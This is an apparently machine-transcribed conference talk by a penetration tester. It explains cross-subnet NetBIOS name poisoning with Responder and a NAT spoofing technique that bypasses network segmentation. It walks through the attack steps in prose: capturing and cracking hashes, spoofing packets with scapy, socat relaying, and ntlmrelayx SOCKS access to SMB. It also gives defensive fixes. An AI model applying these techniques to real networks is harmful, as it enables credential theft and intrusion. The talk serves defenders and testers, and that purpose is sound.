Discover If Your Network Segmentation Is Secure, Or NAT - Anthony Holt

um thank you all for coming uh my name's Anthony I have been in the IT industry for about 20 years I am started off as an IT manager for about 10 years and then decided to join the Dark Side and become a penetration tester about um 10 years ago I'm really happy to be here in Newcastle with you guys um at bides Newcastle as um this is where I'm from I kind of live about 20 minutes away from here and um I set up a company this year called pentest Consultants which are already also based in Newcastle so what we're looking to cover today is um a little bit about a tool called responder what it is how it works

how an attacker could take advantage of it what this means for you in your networks and then an example of it being exploited the same thing for network of your translation hopefully you'll all be um not experts by the end of this slide deck um but we'll talk about what it is how it works and how it can be abused by attackers and ultimately how it can undermine your network segmentation so responder then looks like this it's a python tool it's designed to poison network name resolution things like net bias name resolution and Link localcast name resolution hands up if youve ever heard of or used responder in this room guys hooray that's good now put your

hands back down and hands up again if you've ever used respond to poison not the network you're connected to but a different network not so many that's good and again with the poisoning networks across the internet or hes across the internet you can kind of do that with responder to and we'll we'll get into how that works so for those of you who don't know the way that responder ultimately works is if you imagine you've got a network with a couple of clients a DNS server and a file server and machines don't really use horse names so things like google.com and file print one they like to work with IP addresses and so we have a name system

which con converts those names from the horse name into a IP address the way it usually works is somebody will type into their runbox backb file print one and they'll as soon as they hit the backlash or if they click the okay button what your machine does is it shouts out to the DNS server and it says Hey where's file print one and the DNS server says H it's it's there it's 102.05 and that's great but what what happens when that falls down so say you're like me and you sometimes MP things you hit file print 12 because you've caught the two key at the same time as the one key when you've pressed back slash what happens is your machine

broadcasts to the DNS server or sends a message to the DNS server and says where's file print 12 and the DNS server says and so what happens normally on most networks if you haven't um secured or or made your your network more hardened is your machine will fall back to broadcast name resolution protocols things like net bias name resolution and Link local multicast name resolution and what it does is effectively it shouts in the network is anyone file print 12 now what responder does is it replies to these messages and it says y That's me I'm totally file print 12 please send me your credentials and effectively that's what respond does now I wanted to talk

about how this would look in a real Network and there's quite a lot going on on this and this is going to help us with talking about Network press translation down the road so there's a lot to kind of go through but I'll try and get you orientated um this is a high Lev diagram for a client's Network we've called them example limited um over here on the left you've got the client Network and where we're imagining that there's an attacker that's plugged a device in or they've compromised a machine inside of that Network and they're sat alongside other clients inside of those n inside of that Network um separately we've got a what was Green

is now coming out yellow is servers Network which contains things like your domain controller maybe your card data server maybe your it um jump box that kind of thing we've also got at the Top If firewall which allows traffic between the networks to some extent and also allows people to connect out to the Internet so those of you who don't know what a firewall is um that's fine I'll kind of explain the main thing you need to know um but It ultimately it doesn't matter whether you've got a BT home Hub or Like a Virgin Media business firewall whether you've got a um cisa or a pair ofisas a um sonic wall UTM or some kind

of you know virtual Next Generation AI powered new fangled thing that they've managed to tell you you absolutely need um they all ultimately are going to be doing a bunch of stuff but two of the things that they will be doing hopefully is something called Access Control lists which is what machines are allowed to talk to which machines inside of your network and they'll also do a thing called Network address translation which we'll talk about in a bit of time so going back to our example limited network how would responder work inside of this situation inside of this network so you imagine you've got a client and the client is saying is anyone here fileprint 12 it's broadcasting to the

network you've got your attacker laptop there it's running responder what it's going to do is it's going to say that's absolutely absolutely me please connect to me and when your client connects they the attacker will probably receive a um ker Ross or ENT them um credential which they can potentially crack and reuse to attack other parts of your network and hopefully some of you here today May understand that and know that and but what happens if we're not interested in the clients that we sat alongside what if the juicy creds are over there on the it Bastion or what if we need credentials for the card data environment which is on a separate Network or you know sometimes although

we do ask for organizations to place us into a representative Network you may have been on a pen test before where you're literally the only one in there you've been put on your own VLAN and you've got nothing really to Monitor and poison what can we do that so in that situation what you can do is um spoof net bias name traffic and to talk about that what if I told you that was resp can work across subnet so how does that exactly work and how does responder work well if we bring up wire shark which is a packet capture tool and have a look at how it works under the hood how name resolution Works

under the hood effectively when a client tries to look for a horse name like fileer 12 it will have a connection coming from its IP and it will send it to its broadcast name resolution Network address [Music] it always uses the same Cort it always uses UDP 137137 for both a source and a destination and the key thing to remember or to take away is that it uses something called a transaction ID now a trans transaction ID is a number between 0 and 65,535 and effectively when a response comes back to the host what it's looking for is to find out whether that transaction ID matches if that transaction ID matches it sees it as

being a legitimate response to its request and it will accept the the the response so the attack is old and has been around a long time but I don't feel like a lot of pentesters are taking advantage of it or using it um but all the way back in 2016 you had an article released by Steven Breen and from Fox SCH of security and in his write up of the vulnerability which happened to be a local privilege escalation vulnerability he explained that as well as the local privilege escalation vulnerability called Hot Potato which you might have heard of there's also scope for a new type of attack which is the idea of just root forcing that transaction ID if we

send everything from zero 65,535 to a client continuously then we can poon the name resolution even if we're throwing those packets across networks and you theorized that you could probably do this across the internet if it was FAS now he actually released a tool on GitHub which allows you to do this which is called responder with spoof not sure how many people downloaded this but if you've done it if you have done it and you've used it you'll probably find that what it will do is cause a denial of service attack on your own network so the thing what it does is it you put in an IP address that you're targeting and you put your IP address

which is the one you're trying to spoof and it will go through from zero to 65,535 and it will just repeat that and repeat that and repeat that and effectively it will fill the network with um UDP traffic which is not good so it has ultimately a problem now the bit of cord that's really blurry up there which you might not be able to make out involved what that does is as mentioned it loops around all 65,535 and then it tries again and it tries again and it tries again now I'm not very good at making Python scripts more efficient but I am I do find it quite easy and a lot of people do to

make something less efficient make it slower um so if we just take the tool that Stephen um Breen released and we introduce one line of cord we can introduce a sleep into the function that's used to generate those packets so it will still send all 6 5,000 but it will do it a little bit slower and it'll send about one Meg per sec instead of your full bandwidth being thrown across the network causing problems so that's great so what that means for you it means that if a machine is compromised on your network and or there's anaca that's pluged his device in they're able to then spoof net bias name resolution traffic across those networks um so it introduces more and

additional targets from From pentesters perspective it opens up the ability to spoof those machines that ordinarily you wouldn't ever be seeing any traffic fall press next so the way the um attack would work is once you've added that time sleep into the um net bias MBT spam dop um you run the command like this you specify the interface that you want to use you specify um the target the machine that you going after you specify your IP and then you specify the name that you're wanting to SPO and you mash the goal key and what happens is it generates a lot of traffic but not as much as before the sleep was introduced and it throws them across the network

every single packet has a different transaction ID eventually when the client does try to look up W pads the next time they open their browser or the antivirus checks for updates or something like that it's going to generate a net bias request for wpad it does this three times one second apart and if your packets hit at any point during those three seconds it will poison the um resolution and you'll have hopefully get something like this come back so at the top I've got the um SPO SP as I've called it running which is sending the um spoof messages over at 17217 0100 I've got my responder running on 10 20 30 completely different network

but yet the credentials get thrown at me for for that machine which is great and one of the reasons we ask our users to make sure that they've got good strong secure passwords is to protect against offline Brute Force attacks um so you can then try and crack that to reveal the password for the user is ordering 1986 this years which is great so how do we fix it well we've been a lot of the industry's been messaging for a long time saying that you need to disable broadcast name resolution protocols things like link local mcast M resolution and net bias name resolution you can push these changes through po shell and Group Policy more recently A

lot of people are on boarding with in chune you can potentially create in chune policies to push a Powershell script that will do this for you um but yeah turn it off basically and apply the principle of least privilege to your firewall rules so if your users aren't needing to send UDP 137 between networks don't allow that to happen effectively so in summary the traffic can be poisoned across sub Nets name resolution should be off and you should ask your teams whether they've turned it off and um for us as testers understanding how tools work and what they're doing in the background sometimes opens doors so it's important to make sure you take the time

to learn what's going on under the hood so some people might say that's fine we've got firewalls they're going to say anything from this sketchy Network NW that we don't trust going towards our shiny trusted Network we're going to just block and we're going to drop all that so I wanted to talk to you day also about Network address translation and how you can potentially abuse that to Pivot from one network another so Nat what is Nat Nat is my next door neighbor but Al alongside that it stands for Network address translation and specifically I'm talking about n overload here so the idea of using using one public IP address and having many clients behind

that IP address so I want to hopefully bring you all on board and and and bring you to speed about how that works from a high level um so even if you're not technical hopefully you should be able to kind of follow this along but imagine you have one office and inside that office you have one address for your office but you want to send Parcels out for a lot of different people inside the organization so imagine we've got a red user up here on the red Network we've got a green user down here on a completely separate green Network and they both have packages that they would like to send out towards the internet okay now that's

a lot of packages to keep track of so we're going to need something to do that and what happens is your reception desk or your firewall produces a network address translation table or white B okay and then what happens is when a message gets sent by a user the firewall receiving the package logs it within its Network address translation table and then yous it out the door towards the internet to wherever it's going and when we receive another package come in we make another Network address translation table entry and we again send that message out the door now when a package comes back from the internet we've got a decision to make we need to decide where

is this package going and what we do do is we look at our Network address translation table and we see okay well they match that goes to green and we send the package to the green user and the green Network which is great so how do we attack it and where does it fall down um and how can it undermine our segmentation between our networks now again a few years ago in 2021 um I sat in the hotel room of a premier in on an IT health check doing some research into some new attacks that out and this new thing hit my inbox called frag attack which was a wireless network um exploit which allowed you to inject packets

single packets into wireless networks even if you didn't know what the wpa3 password was and that was very scary but it was implementation specific and it depended on the um wireless access point that you were using and it was patchable and all the rest of it what the tester did a guy called man Matty vanu he created a YouTube video where he explained how his attack worked and he did two things he um injected a single packet onto the network with switched on a light so he explained if your organization has like one of those Internet of Things smart plugs sometimes they don't have authentication on them and he was able to demonstrate hey what

if we inject a single packet onto the network and it's the control packet or switch the S he did that which was great but the next thing he did which I found really interesting was he sent a single packet onto the network which went out the network address translation fire Network address translation and he then connected back into the network to exploit bluee which was a RDP vulnerability which was around at the time very common at the time now this freaked me out because I'd seen some research in the past about how you can punch a hole in you DP you could maybe get somebody to browse your website and somehow then get access to their machine

directly but this kind of changed the way I thought about Network address translation when I realized hang on he's exploited TCP there that's really interesting because that becomes in hacker much more useful so what this means if you imagine back to our Network address translation simulation if you're a red user on the red Network and you create create a package going to a machine that you control but you spoof that packet so yeah I mean it's great having a wireless network vulnerability that affects specific implementations of specific wireless access points super cool stuff but break it down even more simple if you imagine you're already on the network spoof a packet for the network that you try to get to and send that to

the firewall the firewall will create a network address translation entry saying anything coming from this hacker.com goes to the green Network that will then get sent out to the internet when you remote into this machine on the internet and control it and connect back where's the package going to go it's going to get sent straight back to the green Network which is bad basically you end up with command and being sent and received between the Green Network which never seen the machine before and the attacker controlled for on EET which is a very scary thought even if your organization has a firewall that says red network is not allowed to talk to Green Network now the attack is talking to the

green Network through the through the link that's been Crea which is really bad so how does this look on our example limited and how would this look on a real Network so what happens is we need a network address translation table created up in the corner there and we sit on our 10.20 30123 address which we're not interested in but we spoof a packet of 1727 0102 so we're spoofing a packet of this card data controller over here we choose a destination which is an IP that we control and we pick any port and it can literally be any port so if I'm targeting a domain controller I might pick um DNS um but yeah we pick a port

and that goes to the firewall and the firewall creates an entry in its Network address translation table that says hey if I see any packets coming back with P 880 on that internet IP it needs to go back to this machine over here the message gets sent out and goes over to the attacker the attacker then sees the public IP for the network that's connecting out and reaching out and it sees a random Port that's been generated by the network address translation um function of the firewall um it knows that it's connecting on part 8080 so what it needs to do is just do the reverse of this when it sends its message back it picks a source of itself

it picks the source of the port that it was coming from and it targets the public IP belonging to this network and the port because everything matches and marries up when it comes back to the firewall it follows its rule in its Network address translation table and it throws the packet over at the card data machine which is really really bad effectively you have communication from an internet horse directly to one of your internal cost which is a very scary concept now you may have a rule that says we do not allow things on the internet to connect directly to our card data server that's just Madness we' never allow that but that's not the not

there that's not what the firewall saw what the firewall saw was that your card data server attempted to make an outbound connection towards the internet if you've got a firewall rule that allows that then it's going to pass its access control CH just going to throw it so we've got a command and control between these two machines and going back to what really freaked me out when I first saw this attack and kind of understood what was going on I thought well what if this isn't kind of like clients servers like what if this is a client range and a cad data environment what if this is a cad a client Network and operation technology if you've got

some kind of claing control system that's going to be nightmare students and staff if you're in education or the one that really worried me the most guest Fess internet and your internal if you've got the same firewall used between these two systems yes you may have rules that say guest Wi-Fi is not allowed ofo our internal you may be falling for with this and it's going to be causing you problems so I thought let's give an example um for the testers in the rule and this is going to get a little bit more complicated now um but we're going to be talking about attacking the SMB service so SMB is is what Windows uses for file sharing it

can be used to execute commands remotely on machines it's a very interesting service and it's a um TCP service and we have tools already that work with the service so I thought let's try and see how we can exploit that and let's see what the problems are going to be when we try try and explain that so I created a little python script using scapy that generated packets so all it does is it creates a putting an IP address that I want to be targeting on the network and I put in my IP address for my VPS server on the internet and I put Port 880 in or whatever Port I want to use and I run

the python script and what it does is it just generates that one packet and places it on the network what happens is that that packet ends up appearing from the client's public IP and it goes to my IP address out on the internet The Source part is random picked randomly by the um the firewall as it as it creates its s entry and the destination Port is the port that I'm expecting which is 88 now the first problem that I'm going to hit is that I don't have a service running on Port 88 on my machine at the moment so my machine is going to create a reset packet and when that reset packet set back to the firewall it's

going to decide okay we're not doing anything with this connection we're just going to bin it off and it'll close it down so problem one or solution one for problem one use IP tables or something to drop those reset packets don't let them leave your machine okay that's that FS Right Next Step let me so we produce the packet and it goes out from the client to my control machine on the internet pots changed that's fine but I need a way of sending a message back and the message that I send back has to have a source part of whatever that firewall came up with okay if it doesn't it's not going to match that n Rule and it's just going

to get dropped by the fire so you'll find that when you use tools like CRA exac net exac they do not have the ability to set a source Port okay you check the kind of help reget for Port there's no option to say I want all this traffic to come from Port 476 37 so solution two is to stick something in the middle of the tool you're trying to use CMC and the um your machine which is about to create that packet and send the connection back so we use socat to do that socat we can create a listener on our machine we can set it to our local IP address on the virtual private server that we're

controlling and we can then specify the um targets public IP the port that we know we need to use and we can say that the source Port needs to be um port 8080 there so we're targeting Port 47637 as a destination but the source Port needs to match the one that the client tried to hit and that's great you'll do that and then you'll find that net exec still doesn't work and the problem is that net exec is quite yappy or cack exec if you've ever used that it creates multiple connections okay it does want to check with SMB signing switched on it does a separate want to decide whether it's using SMB version 2

or SMB version 3 or whether it's using SMB version one it basically produces a number of connections outbound and unfortunately for um for the tester of the attacker you only have the one opportunity you've created your spoof packet you get to reply to that spoof packet and as soon as that communication's dropped and finished you then need to SPO more packets so you can absolutely smooth more packets that can be a thing um but a solution to this with SMB would be to use something like ntlm relay x with its socks mod so if you've not seen this ntlm relay X has a really handy ability to create a single connection using SMB and create a socks

proxy which you can then Loop into and send your multiple connections so we get NM X started and we tell it to listen to local post and we target our um s cap um Port that we connection that we set up earlier we then authenticate against the SMB service that we created so we s this our VPS and forward 445 and then we authenticate against that 445 if you follow those steps end to end effectively you'll end up with something like this saying hey give me the password you put the password in and you'll receive a message saying the attack succeeded and a socks tunnel is now created you can then send multiple requests through that socks port to then

do what it is that you want to do against that SMB service so in this case as an example I've authenticated I found them an admin I've then run a command I found out that I'm entty Authority system and then I've um dropped some hashes just to demonstrate that I'm doing multiple things long story short if you're trying to do this remember that you'll only have the one opportunity so you either need to create something that sends multiple Spooks and you hop off the back of that or you need to create some kind of middleware or use something like en Rel X to sit in the middle so from the machines perspective the serers perspective this looks really

freaky if you imagine you're kind of you're you're a domain controller and you just sat there minding your own business protected in the internal Network all of a sudden a wild packet appears that does say I promise you the external IP for the attack okay so this SMB service just kind of appears out of nowhere and the connection then just carries on and works up until that connections been dropped so what does this mean and what's the impact to you as an organization what I'm trying to tell you when I'm trying to put across here is instead of connecting directly from that you know untrusted Network into that trusted network if you're happy to kind of leave the network and

go out to the internet and come back you can absolutely bypass Network segmentation and access those protected internal networks this could be combined with the talk that that I mentioned earlier about net bias name resolution service so there's nothing stopping you doing this multiple times you could land into the client Network you could spoof UDP and try and get something to connect back to you poison the name resolution using n bias name resolution and then once you've got the credentials you can then SPO TCP and make yourself back in that way and combine the two which is a very scary thought so how do we fix it now if you log into your firewall you

will have likely something called anti-spoofing or you'll have something called unicast reverse path forwarding which is a very clever um solution what unicast reverse path forwarding does is for every packet that arrives on an interface the firewall looks at its routing table and it decides could I reach that from here and if it can't reach it from there it just drops the packet which is great now when I do F War reviews for organizations I find that this is switched on very often however the most organizations and possibly just by default out of the box it's only switched on for the external internet interface you guys need to enable this for your internal network interfaces or at least for that guest

wireless network interface and that kind of thing the other thing that you can do to solve the problem is you can add even more firewalls into the solution so if you had a firewall here on the edge of the network that you're trying to protect this firewall here is going to have its own network address translation T and so me spoofing and creating a network address entry on here when that packet comes back this F is not going to have heard of that connection before and it's not going to let it through so that would be a good way to resolve the issue another thing I consider as well is to take a look at you're kind of what I

call you defense in depth so install more submarines and build more underwat castles whatever phrase you want to do but look at your um wider picture you know do you users have good strong passwords to make it hard for um the attackers to crack those passwords in an offline attack have you got specific restricted outbound Network firewall rules that you know restrict the ability for that card data server to go out to the internet in the first place those will ultimately help so in summary Network address translation can kind of undermine any expected Network segmentation controls attacks against your broadcast name resolution are still valid today respond has been around for a very long time and

um I still use it in a in a in a in a penetration test that I'm doing um you know nowadays more recently but I'll be doing the SPO thinking more than the um them resolution thing and as testers um it's important really for us to when we receive these kind of alerts saying hey there's a new tool or hey there's a new attack a new attack against specific Wireless implementations it's always good to kind of spend a little bit of time reading about how those attacks work and what the tools actually doing under the hood because that can sometimes make you um imagine or or think about a different way or a different method that you're able to

implement to abuse that vulnerability that's being described if you guys have any kind of questions um I don't know how much time we've got now because I know that that hit about 28 minutes when I've been rehearsing it um please catch me outside or drop me a email or a LinkedIn message or something like that um yeah have we got any time for any questions okay yeah so we're good that's it that's [Applause]